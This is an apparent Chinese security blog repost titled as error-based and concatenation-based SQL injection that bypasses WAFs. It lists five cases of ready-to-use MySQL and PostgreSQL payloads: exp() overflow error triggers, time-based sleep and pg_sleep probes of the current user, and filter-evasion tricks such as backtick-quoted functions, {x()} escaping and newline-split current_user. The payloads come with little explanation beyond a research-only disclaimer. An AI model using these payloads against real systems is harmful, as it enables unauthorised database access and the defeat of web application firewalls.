还请各位高抬贵手,别来日我的站了,博客有Ai分析CVE和仓库
这是自己搭建的 github AI监控
https://blog.897010.xyz/c/today
另外分享几个注入案例
0x01 error 语句 --> mysql
/xx?id=1&code=xx&status=1
(select aa) as a FROM table_b where1=1and (( id =''and code ='') ) orderby cc asc
false'or+exp(709)or'
false'or+exp(710)or'
/xx?id=1&code=false'or+exp(709)or'&status=1
/xx?id=1&code=false'or+exp(710)or'&status=1
0x02 error 语句 --> pg
{"id":"xx","page":1}
select count(*) from ( select id as aa from table_b group by id);
user ❌ --> $$user$$ ✅
(selectrpg_sleep(exp(714-length($$user$$)))),1
{"id":"(selectrpg_sleep(exp(714-length($$user$$)))),1","page":1}
{"id":"(selectrpg_sleep(exp(715-length($$user$$)))),1","page":1}
0x03 difference response --> mysql
id=xx
'||exp(709)||'
'||exp(710)||'
length ❌ --> character_length ❌ --> char_length ❌ --> `char_length` ✅
version() ❌ --> {x(version())} ✅
id='||`cHar_leNGTh`({x(verSion())})!={{int(1-20)}}||'
0x04 difference response --> mysql
id=xx
user() ❌ --> current_user ❌ --> current_user%0a() ✅
id=(sleep(exp({{int(710-740)}}-length(currENT_USEr%0a()))))
0x05 difference response --> mysql
id==xx
length ❌--> character_length ❌--> char_length ❌--> `char_length`
false'||`nullif`F({{int(1-10)}},`cHar_leNGTh`(currENT_USErF()))||'
"id": "false'||`nullif`F({{int(1-10)}},`cHar_leNGTh`(currENT_USErF()))||'"
原文始发于微信公众号(安全的黑魔法):从报错到拼接语句绕waf的注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论